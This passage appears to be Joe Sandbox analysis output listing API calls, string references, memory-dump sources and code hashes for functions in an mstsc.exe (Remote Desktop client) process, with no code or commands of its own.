                                                                                                              APIs
                                                                                                                • Part of subcall function 00883E7C: EventActivityIdControl.ADVAPI32(00000001,00000000,00000000,00000000,0088B068,?), ref: 00883E9E
                                                                                                              • LocalAlloc.KERNEL32(00000040,00000000,00000000,00000000,?,?,?,0081C408), ref: 00807186
                                                                                                              • LocalFree.KERNEL32(00000000), ref: 00807230
                                                                                                                • Part of subcall function 0079B721: _vsnwprintf.MSVCRT ref: 0079B753
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2805615729.0000000000770000.00000040.80000000.00040000.00000000.sdmp, Offset: 00770000, based on PE: true
                                                                                                               • Associated: 00000008.00000002.2805615729.000000000088D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                               • Associated: 00000008.00000002.2805855639.0000000000892000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_770000_mstsc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Local$ActivityAllocControlEventFree_vsnwprintf
                                                                                                              • String ID: %s\%s$Memory allocation failed$Servers$StringCchPrintf failed
                                                                                                              • API String ID: 3268872356-1330720887
                                                                                                              • Opcode ID: f1b99af8156b5b30a0e7a56dd41edc45c5814d99705cd3d9476d5a66a8463954
                                                                                                              • Instruction ID: 6a8c53ac6b20ca2778df87c052370eff38eedb1c6b09ff2ac83396369f922dcb
                                                                                                              • Opcode Fuzzy Hash: f1b99af8156b5b30a0e7a56dd41edc45c5814d99705cd3d9476d5a66a8463954
                                                                                                              • Instruction Fuzzy Hash: F1411671A44204BFEB59AE98DC8AF263BAAFB44714F150059F502DB1E2D778E901CB92
                                                                                                              APIs
                                                                                                              • DisconnectNamedPipe.KERNEL32(?,00000000,00000008,00000000,?,007ED170,80004004,?,007ECADC,00000000,00000000,00000000,80004005,00000000,00000008), ref: 007ED1A5
                                                                                                              • CloseHandle.KERNEL32(?,?,007ED170,80004004,?,007ECADC,00000000,00000000,00000000,80004005,00000000,00000008,?,007ECAB5,Faild to init lock,80004005), ref: 007ED1AE
                                                                                                              • CreateThreadpoolWork.KERNEL32(007ED260,00000002,00000000), ref: 007ED1E0
                                                                                                              • SubmitThreadpoolWork.KERNEL32(00000000,?,007ED170,80004004,?,007ECADC,00000000,00000000,00000000,80004005,00000000,00000008,?,007ECAB5,Faild to init lock,80004005), ref: 007ED1ED
                                                                                                              • CloseThreadpoolWork.KERNEL32(00000000,?,007ED170,80004004,?,007ECADC,00000000,00000000,00000000,80004005,00000000,00000008,?,007ECAB5,Faild to init lock,80004005), ref: 007ED1F4
                                                                                                              • GetLastError.KERNEL32(?,007ED170,80004004,?,007ECADC,00000000,00000000,00000000,80004005,00000000,00000008,?,007ECAB5,Faild to init lock,80004005,Cannot allocate memory), ref: 007ED1FC
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2805615729.0000000000770000.00000040.80000000.00040000.00000000.sdmp, Offset: 00770000, based on PE: true
                                                                                                               • Associated: 00000008.00000002.2805615729.000000000088D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                               • Associated: 00000008.00000002.2805855639.0000000000892000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_770000_mstsc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ThreadpoolWork$Close$CreateDisconnectErrorHandleLastNamedPipeSubmit
                                                                                                              • String ID:
                                                                                                              • API String ID: 842603779-0
                                                                                                              • Opcode ID: 91c025093b3d8e6555edd2ea3e5ea937f8d083b67283bbe6ca03214c7cca8061
                                                                                                              • Instruction ID: a815d4cf200876363ab5e05e85cba7dfc1fd204122ad52304072a108ad437563
                                                                                                              • Opcode Fuzzy Hash: 91c025093b3d8e6555edd2ea3e5ea937f8d083b67283bbe6ca03214c7cca8061
                                                                                                              • Instruction Fuzzy Hash: 5121E232101744DFC7346F69DC89927B7AAFF89320710062DF592865A1DB39EC41DB11
                                                                                                              APIs
                                                                                                              • memset.MSVCRT ref: 0080D163
                                                                                                              • memset.MSVCRT ref: 0080D172
                                                                                                              • GetDlgItem.USER32(?,007D37BB), ref: 0080D180
                                                                                                              • GetDlgItem.USER32(?,00003381), ref: 0080D191
                                                                                                              • GetWindowPlacement.USER32(?,?,?,?,?,?,?,00000000), ref: 0080D1B2
                                                                                                              • GetWindowPlacement.USER32(00000000,?,?,?,?,?,?,00000000), ref: 0080D1BD
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2805615729.0000000000770000.00000040.80000000.00040000.00000000.sdmp, Offset: 00770000, based on PE: true
                                                                                                               • Associated: 00000008.00000002.2805615729.000000000088D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                               • Associated: 00000008.00000002.2805855639.0000000000892000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_770000_mstsc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ItemPlacementWindowmemset
                                                                                                              • String ID:
                                                                                                              • API String ID: 2290485045-0
                                                                                                              • Opcode ID: c1ba2b54835dc69f2a03dc692739d4f918a952e1b8543a53f2be1fa375263107
                                                                                                              • Instruction ID: 44a89aca2f86f236341705e9cf62ff8778838769ce13b04d5861d6bededc2cc2
                                                                                                              • Opcode Fuzzy Hash: c1ba2b54835dc69f2a03dc692739d4f918a952e1b8543a53f2be1fa375263107
                                                                                                              • Instruction Fuzzy Hash: 0D114272E00318BBDB14AFE9EC49DAF7B79FB84700F044129F509E7291DA709905CBA0
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2805615729.0000000000770000.00000040.80000000.00040000.00000000.sdmp, Offset: 00770000, based on PE: true
                                                                                                               • Associated: 00000008.00000002.2805615729.000000000088D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                               • Associated: 00000008.00000002.2805855639.0000000000892000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_770000_mstsc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: String$memcpy_s$AllocFree
                                                                                                              • String ID:
                                                                                                              • API String ID: 3865269606-0
                                                                                                              • Opcode ID: 2c2b9b033e5b5f34c1ddd599af289e2c91a10d33acd57876631b53cdb3327632
                                                                                                              • Instruction ID: c6b7ec6e5617fccc51f239c169d7c6186ed7a0762373693dfbfe998c30f87f72
                                                                                                              • Opcode Fuzzy Hash: 2c2b9b033e5b5f34c1ddd599af289e2c91a10d33acd57876631b53cdb3327632
                                                                                                              • Instruction Fuzzy Hash: FC119371604209EFEB109F68DC88E6A77FAFF84354B24092AF845C7261EB76DD10DB60
                                                                                                              APIs
                                                                                                              • CheckDlgButton.USER32(?,00003328,?), ref: 007C5049
                                                                                                              • CheckDlgButton.USER32(?,00003330,?), ref: 007C505F
                                                                                                              • CheckDlgButton.USER32(?,0000332F,?), ref: 007C5075
                                                                                                              • CheckDlgButton.USER32(?,00003329,?), ref: 007C508C
                                                                                                              • CheckDlgButton.USER32(?,0000332A,?), ref: 007C50A4
                                                                                                              • CheckDlgButton.USER32(?,0000332B,?), ref: 007C50BA
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2805615729.0000000000770000.00000040.80000000.00040000.00000000.sdmp, Offset: 00770000, based on PE: true
                                                                                                               • Associated: 00000008.00000002.2805615729.000000000088D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                               • Associated: 00000008.00000002.2805855639.0000000000892000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_770000_mstsc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ButtonCheck
                                                                                                              • String ID:
                                                                                                              • API String ID: 83588225-0
                                                                                                              • Opcode ID: 7b61b818ac66001c1ed03f3c9af74f8a22c5737460c2ec1f4d0003e9cd259d08
                                                                                                              • Instruction ID: da22532f0aeff1c6baee21891780138881035e9b964fb7fb8bbb8e27538fff9d
                                                                                                              • Opcode Fuzzy Hash: 7b61b818ac66001c1ed03f3c9af74f8a22c5737460c2ec1f4d0003e9cd259d08
                                                                                                              • Instruction Fuzzy Hash: 02118CB6350B197FE3010F0CEC86D62BB7CFB08759B014236F900CA9E0DB68DE269690
                                                                                                              APIs
                                                                                                                • Part of subcall function 0079ECAA: DeleteMenu.USER32(?,?,00000000), ref: 0079ECC5
                                                                                                                • Part of subcall function 0079ECAA: DeleteMenu.USER32(?,000000AB,00000000), ref: 0079ECE5
                                                                                                                • Part of subcall function 0079ECAA: memset.MSVCRT ref: 0079ECF9
                                                                                                                • Part of subcall function 0079ECAA: GetMenuItemInfoW.USER32(?,-0000003C,00000000,?), ref: 0079ED10
                                                                                                                • Part of subcall function 0079ECAA: DeleteMenu.USER32(?,-0000003C,00000000), ref: 0079ED1F
                                                                                                              • IsWindow.USER32(?), ref: 007A423F
                                                                                                                • Part of subcall function 0079AF9C: SendMessageW.USER32(00000000,00000111,000033B3,00000000), ref: 0079AFB1
                                                                                                              • PostMessageW.USER32(?,00008102,?,?), ref: 007A429E
                                                                                                                • Part of subcall function 007BB520: SysFreeString.OLEAUT32(00000000), ref: 007BB571
                                                                                                                • Part of subcall function 007BB520: SysFreeString.OLEAUT32(00000000), ref: 007BB5A6
                                                                                                              • IsWindow.USER32(?), ref: 007A438D
                                                                                                              • GetDlgItem.USER32(?,00001394), ref: 007A439F
                                                                                                                • Part of subcall function 00798010: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,00000000,Microsoft.Windows.RemoteDesktop), ref: 0079803E
                                                                                                                • Part of subcall function 00798010: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 00798050
                                                                                                                • Part of subcall function 00798010: FreeLibrary.KERNEL32(?), ref: 0079806F
                                                                                                                • Part of subcall function 00797ECC: TraceMessage.ADVAPI32(00000008,?,0000002B,00792FE8,00000054,0088B068,00000004,00000000,00000005,00000000,00000004,00000000,00000000,00000000,0088A000), ref: 00797F14
                                                                                                              Strings
                                                                                                              • GetUpdatesFromControl failed!, xrefs: 007A4352
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2805615729.0000000000770000.00000040.80000000.00040000.00000000.sdmp, Offset: 00770000, based on PE: true
                                                                                                               • Associated: 00000008.00000002.2805615729.000000000088D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                               • Associated: 00000008.00000002.2805855639.0000000000892000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_770000_mstsc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Menu$DeleteFreeMessage$ItemStringWindow$AddressHandleInfoLibraryModulePostProcSendTracememset
                                                                                                              • String ID: GetUpdatesFromControl failed!
                                                                                                              • API String ID: 2203156620-1427388055
                                                                                                              • Opcode ID: 68e56c3b62dbdd79027d20efa2c22d014696e94d88968e7fac2dfa56ce6086c3
                                                                                                              • Instruction ID: fe3c8a87d90500d2b84c5b66f270d0f82f32a80c7d3d7fa0612426d0f1fbaa24
                                                                                                              • Opcode Fuzzy Hash: 68e56c3b62dbdd79027d20efa2c22d014696e94d88968e7fac2dfa56ce6086c3
                                                                                                              • Instruction Fuzzy Hash: CA817F30600204DFDF19DF58C889BA97BA2FFC5314F1441A9ED45AB2A3DB7AD842CB51
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2806843490.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: true
                                                                                                               • Associated: 00000008.00000002.2806843490.0000000004C69000.00000040.00001000.00020000.00000000.sdmp
                                                                                                               • Associated: 00000008.00000002.2806843490.0000000004C6D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                               • Associated: 00000008.00000002.2806843490.0000000004CDE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_4b40000_mstsc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ___swprintf_l
                                                                                                              • String ID: %%%u$[$]:%u
                                                                                                              • API String ID: 48624451-2819853543
                                                                                                              • Opcode ID: 1616b523fcba02ee9ae7d1409889d2cc2c5fafad74021faf8dd0f08771550a5d
                                                                                                              • Instruction ID: 9dbce77a74a2e1b8a3208f197390e57cda0cd9c5c6333341858ccf91d83e5b02
                                                                                                              • Opcode Fuzzy Hash: 1616b523fcba02ee9ae7d1409889d2cc2c5fafad74021faf8dd0f08771550a5d
                                                                                                              • Instruction Fuzzy Hash: 5921337AA00129ABDB10DEB9DD40EFE77F9EF54644F4401A6E945E3200E770AA019BA1
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2805615729.0000000000770000.00000040.80000000.00040000.00000000.sdmp, Offset: 00770000, based on PE: true
                                                                                                               • Associated: 00000008.00000002.2805615729.000000000088D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                               • Associated: 00000008.00000002.2805855639.0000000000892000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_770000_mstsc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Thread_ftol2_sse$CurrentSleepSwitch
                                                                                                              • String ID:
                                                                                                              • API String ID: 289552206-0
                                                                                                              • Opcode ID: 220d3394514e9466d6949bffd805dbaec0e04bec4859b0c084827ecda9982698
                                                                                                              • Instruction ID: 5b33fd12e4ffbedc607831e70274d1a6ff8e8eab592f03f93d96d0803fd71da2
                                                                                                              • Opcode Fuzzy Hash: 220d3394514e9466d6949bffd805dbaec0e04bec4859b0c084827ecda9982698
                                                                                                              • Instruction Fuzzy Hash: 29213A32A00A1DEBDB90AB69DC4577AB7A9FB44360F218139E606D6340DF78DC529352
                                                                                                              APIs
                                                                                                                • Part of subcall function 00798010: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,00000000,Microsoft.Windows.RemoteDesktop), ref: 0079803E
                                                                                                                • Part of subcall function 00798010: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 00798050
                                                                                                                • Part of subcall function 00798010: FreeLibrary.KERNEL32(?), ref: 0079806F
                                                                                                              • DeleteMenu.USER32(0000000B,?,00000000), ref: 007A2265
                                                                                                              Strings
                                                                                                              • Unable to get property UTREG_UI_MANUAL_CLIP_SYNC_ENABLED!, xrefs: 007A2235
                                                                                                              • ManualClipboardSyncEnabled, xrefs: 007A2202
                                                                                                              • QueryInterface(IID_IMsRdpExtendedSettings) failed!, xrefs: 007A21D6
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2805615729.0000000000770000.00000040.80000000.00040000.00000000.sdmp, Offset: 00770000, based on PE: true
                                                                                                               • Associated: 00000008.00000002.2805615729.000000000088D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                               • Associated: 00000008.00000002.2805855639.0000000000892000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_770000_mstsc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AddressDeleteFreeHandleLibraryMenuModuleProc
                                                                                                              • String ID: ManualClipboardSyncEnabled$QueryInterface(IID_IMsRdpExtendedSettings) failed!$Unable to get property UTREG_UI_MANUAL_CLIP_SYNC_ENABLED!
                                                                                                              • API String ID: 1846715131-2732231424
                                                                                                              • Opcode ID: 305fed15fa7c7b9fb73f43853fd099d5786c897771f757bf2f7ae9295a676248
                                                                                                              • Instruction ID: 8dba7c49e5c4e99fc3e03606da4e8db991c8bac7e2e7210e6d39f5a69114e509
                                                                                                              • Opcode Fuzzy Hash: 305fed15fa7c7b9fb73f43853fd099d5786c897771f757bf2f7ae9295a676248
                                                                                                              • Instruction Fuzzy Hash: 1C319231604200EFEF18AFACCC89B6A7BA5BF85315F254259E605971E3C7789C46DB42

APIs
• TlsFree.KERNEL32(?,0088BF44,00000000,?,008850CF,?,00000001,?,00000000,00000000,0088B068,?,00000002,00000000), ref: 008850F7
Strings
• Failed to unregister the thread window class, xrefs: 0088516E
• Failed to unregister the timer window class, xrefs: 008851AE
• Failed to terminate timer globals, xrefs: 0088512E
Memory Dump Source
• Source File: 00000008.00000002.2805615729.0000000000770000.00000040.80000000.00040000.00000000.sdmp, Offset: 00770000, based on PE: true
• Associated: 00000008.00000002.2805615729.000000000088D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000008.00000002.2805855639.0000000000892000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_770000_mstsc.jbxd
Similarity
• API ID: Free
• String ID: Failed to terminate timer globals$Failed to unregister the thread window class$Failed to unregister the timer window class
• API String ID: 3978063606-2031851587
• Opcode ID: e9b99942cc5d74bd737af7c66b017b1d8f8e3b8ab12492a4d1ce663ca797c20a
• Instruction ID: db8168725f890d52394a6df54185c15c3bcb96f2ca0e0012b8051a10a88b88a4
• Opcode Fuzzy Hash: e9b99942cc5d74bd737af7c66b017b1d8f8e3b8ab12492a4d1ce663ca797c20a
• Instruction Fuzzy Hash: 8C318135200A40AFEB7ABB68EC4DB263757FB44714F280489F501CA0E2DB69CC95C752

APIs
Strings
Memory Dump Source
• Source File: 00000008.00000002.2806843490.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: true
• Associated: 00000008.00000002.2806843490.0000000004C69000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.2806843490.0000000004C6D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.2806843490.0000000004CDE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_4b40000_mstsc.jbxd
Similarity
• API ID: ___swprintf_l
• String ID: %%%u$]:%u
• API String ID: 48624451-3050659472
• Opcode ID: 7c3db71b544ccb80507b2ba65932566b1b0401aa6b7326486af8d68272c1e8d5
• Instruction ID: e5fcf8ab5c440359f11f8aafddc64a1bb051d6132271cbfb2469db00de2f2bf1
• Opcode Fuzzy Hash: 7c3db71b544ccb80507b2ba65932566b1b0401aa6b7326486af8d68272c1e8d5
• Instruction Fuzzy Hash: 51315472A002299FDB20DE29CD50BEFB7FDEF44614F444595E849E3240EB70BA449BA1

APIs
• GetModuleHandleW.KERNEL32(kernelbase.dll), ref: 007FF0FB
• GetProcAddress.KERNEL32(00000000,RaiseFailFastException), ref: 007FF107
Strings
Memory Dump Source
• Source File: 00000008.00000002.2805615729.0000000000770000.00000040.80000000.00040000.00000000.sdmp, Offset: 00770000, based on PE: true
• Associated: 00000008.00000002.2805615729.000000000088D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000008.00000002.2805855639.0000000000892000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_770000_mstsc.jbxd
Similarity
• API ID: AddressHandleModuleProc
• String ID: RaiseFailFastException$kernelbase.dll
• API String ID: 1646373207-919018592
• Opcode ID: 4cc862342f57201c6787efdad54d68fb092bd0db07ca7c07fa0c5123bf3c00ed
• Instruction ID: 9bc3913c44d38e5f050528b8b20aac64dea300f374395e3941dea400229a3eb0
• Opcode Fuzzy Hash: 4cc862342f57201c6787efdad54d68fb092bd0db07ca7c07fa0c5123bf3c00ed
• Instruction Fuzzy Hash: FAE01276541329B78B212F99DC0CC5EBF29FF447A17014021FD16922A1CB35DC11DBE0

APIs
• memset.MSVCRT ref: 007FA200
  • Part of subcall function 008067E6: wcstol.MSVCRT ref: 00806835
  • Part of subcall function 00883E7C: EventActivityIdControl.ADVAPI32(00000001,00000000,00000000,00000000,0088B068,?), ref: 00883E9E
Strings
Memory Dump Source
• Source File: 00000008.00000002.2805615729.0000000000770000.00000040.80000000.00040000.00000000.sdmp, Offset: 00770000, based on PE: true
• Associated: 00000008.00000002.2805615729.000000000088D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000008.00000002.2805855639.0000000000892000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_770000_mstsc.jbxd
Similarity
• API ID: ActivityControlEventmemsetwcstol
• String ID: CUT::GetServerNameFromFullAddress failed!$StringCchCopy failed$pProfile->SetProxyHostName
• API String ID: 3358987373-1208241228
• Opcode ID: 9b8523b6ef186980e7891d994ce68eb812ab451fdb88a157ef8127fce1997b80
• Instruction ID: 163578131c305d48384435edbf78ca071617ea80323e1233f3366f80e562d778
• Opcode Fuzzy Hash: 9b8523b6ef186980e7891d994ce68eb812ab451fdb88a157ef8127fce1997b80
• Instruction Fuzzy Hash: 5D413DB1718358A7D729AE28C849B763696FF85714F150159EA0ACB3E1DB2CCC0483D3

APIs
  • Part of subcall function 00883E7C: EventActivityIdControl.ADVAPI32(00000001,00000000,00000000,00000000,0088B068,?), ref: 00883E9E
• LocalFree.KERNEL32(?), ref: 00888247
• LocalAlloc.KERNEL32(00000040,?), ref: 00888264
• memcpy.MSVCRT(?,?,?), ref: 008882C1
Strings
Memory Dump Source
• Source File: 00000008.00000002.2805615729.0000000000770000.00000040.80000000.00040000.00000000.sdmp, Offset: 00770000, based on PE: true
• Associated: 00000008.00000002.2805615729.000000000088D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000008.00000002.2805855639.0000000000892000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_770000_mstsc.jbxd
Similarity
• API ID: Local$ActivityAllocControlEventFreememcpy
• String ID: *ppbOutBlob
• API String ID: 1585473126-1332186423
• Opcode ID: 703aec4f541a8296661f9f66d669d840777a14dff003ce081450b73211f36e40
• Instruction ID: de7ddd3589769e5babd8fc3c6c5e5eff773433f09f49a7c4e46b73b5c63d910d
• Opcode Fuzzy Hash: 703aec4f541a8296661f9f66d669d840777a14dff003ce081450b73211f36e40
• Instruction Fuzzy Hash: F241C071100B11EFEB1ABF58D889F227BA6FF54724F64045AF940DB2A2CB74C844CB92

APIs
• memset.MSVCRT ref: 007D417D
• VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003), ref: 007D41AB
• VerSetConditionMask.KERNEL32(00000000,?,00000001,00000003), ref: 007D41B7
• VerifyVersionInfoW.KERNEL32(0000011C,00000003,00000000), ref: 007D41C8
Memory Dump Source
• Source File: 00000008.00000002.2805615729.0000000000770000.00000040.80000000.00040000.00000000.sdmp, Offset: 00770000, based on PE: true
• Associated: 00000008.00000002.2805615729.000000000088D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000008.00000002.2805855639.0000000000892000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_770000_mstsc.jbxd
Similarity
• API ID: ConditionMask$InfoVerifyVersionmemset
• String ID:
• API String ID: 375572348-0
• Opcode ID: 220c2388ba639815f38404c6d022437ee733cda5b437996fe9bffa199128bf3c
• Instruction ID: 6fb74bb1c22d484968fcff745c13c1e7dc84354d0a765241677b289a3c99f457
• Opcode Fuzzy Hash: 220c2388ba639815f38404c6d022437ee733cda5b437996fe9bffa199128bf3c
• Instruction Fuzzy Hash: 02F01870A81308BBEB20AB54DC4BFD977BDFB48B04F504094B605AA1C1DBF49A548B55

APIs
  • Part of subcall function 007DFFE6: VariantInit.OLEAUT32(?), ref: 007E0006
  • Part of subcall function 007DFFE6: VariantClear.OLEAUT32(?), ref: 007E0186
• GetTickCount.KERNEL32 ref: 007E1232
Strings
Memory Dump Source
• Source File: 00000008.00000002.2805615729.0000000000770000.00000040.80000000.00040000.00000000.sdmp, Offset: 00770000, based on PE: true
• Associated: 00000008.00000002.2805615729.000000000088D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000008.00000002.2805855639.0000000000892000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_770000_mstsc.jbxd
Similarity
• API ID: Variant$ClearCountInitTick
• String ID: Listener is terminated$Wait failed
• API String ID: 4072998923-971817836
• Opcode ID: 3c8cb1d9c8ea313ea7017e677fbf539ca429a8296a4cdfe942b150f7f99d8896
• Instruction ID: 8c73c2bc6528d1b9d7c1ce7623e316d8e4704f954cbcd4bd65ff336b89756a5c
• Opcode Fuzzy Hash: 3c8cb1d9c8ea313ea7017e677fbf539ca429a8296a4cdfe942b150f7f99d8896
• Instruction Fuzzy Hash: 77918E71205345CFCB18EF29C885A2E7BE6BF88310B55055DE946DB2A7DB38EC45CB82

APIs
• LocalAlloc.KERNEL32(00000040,?,?,00000000,?,?,?,?,0080DF98,?,?,?,?,?,00000000,00000000), ref: 0080F0CA
• CertDuplicateCertificateContext.CRYPT32(?), ref: 0080F131
  • Part of subcall function 00798010: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,00000000,Microsoft.Windows.RemoteDesktop), ref: 0079803E
  • Part of subcall function 00798010: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 00798050
  • Part of subcall function 00798010: FreeLibrary.KERNEL32(?), ref: 0079806F
  • Part of subcall function 0079686C: TraceMessage.ADVAPI32(00000008,?,0000002B,00781B08,0000000B,0088B068,00000004,00000000,00000005,00000000,00000000,00000000,00000000,?,007DBBCC,0079A670), ref: 007968AC
Strings
Memory Dump Source
• Source File: 00000008.00000002.2805615729.0000000000770000.00000040.80000000.00040000.00000000.sdmp, Offset: 00770000, based on PE: true
• Associated: 00000008.00000002.2805615729.000000000088D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000008.00000002.2805855639.0000000000892000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_770000_mstsc.jbxd
Similarity
• API ID: AddressAllocCertCertificateContextDuplicateFreeHandleLibraryLocalMessageModuleProcTrace
• String ID: pCertArray
• API String ID: 2178560606-662488200
• Opcode ID: 07d86b0e92e3bb47f9309ac5670b3dbe567f6b7328838ebe7e634f90eecd37c4
• Instruction ID: b6608eb2667dd984d4e2a934c1f054a84e35671834fd26f1569a6c608cf5a86c
• Opcode Fuzzy Hash: 07d86b0e92e3bb47f9309ac5670b3dbe567f6b7328838ebe7e634f90eecd37c4
• Instruction Fuzzy Hash: 1C218C75600304EFD766CF5CDC89E16BBA5FB89724B1580A9FA00DB3A2D675DC00CB60

APIs
• LoadLibraryW.KERNEL32(Advapi32.dll,00000000,?,007F8FD0,?,00000000,?,?,?,?,007E0140), ref: 007F90ED
• GetLastError.KERNEL32(?,?,?,007E0140), ref: 007F90FD
Strings
Memory Dump Source
• Source File: 00000008.00000002.2805615729.0000000000770000.00000040.80000000.00040000.00000000.sdmp, Offset: 00770000, based on PE: true
• Associated: 00000008.00000002.2805615729.000000000088D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000008.00000002.2805855639.0000000000892000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_770000_mstsc.jbxd
Similarity
• API ID: ErrorLastLibraryLoad
• String ID: Advapi32.dll
• API String ID: 3568775529-3915320344
• Opcode ID: d7194f6c763ead9e763d289497989fd2e8afaf3d38ab16c9da437e5e680dfd83
• Instruction ID: 2e789ed6f4dbedeecf0f4671c66aa9afef10f5936f9e157d4e4ea76c533e5bfd
• Opcode Fuzzy Hash: d7194f6c763ead9e763d289497989fd2e8afaf3d38ab16c9da437e5e680dfd83
• Instruction Fuzzy Hash: DA11C13214021BABD72D9B5C984DF22BB52BB85320F2904B5EB409B3A2C63DDC819792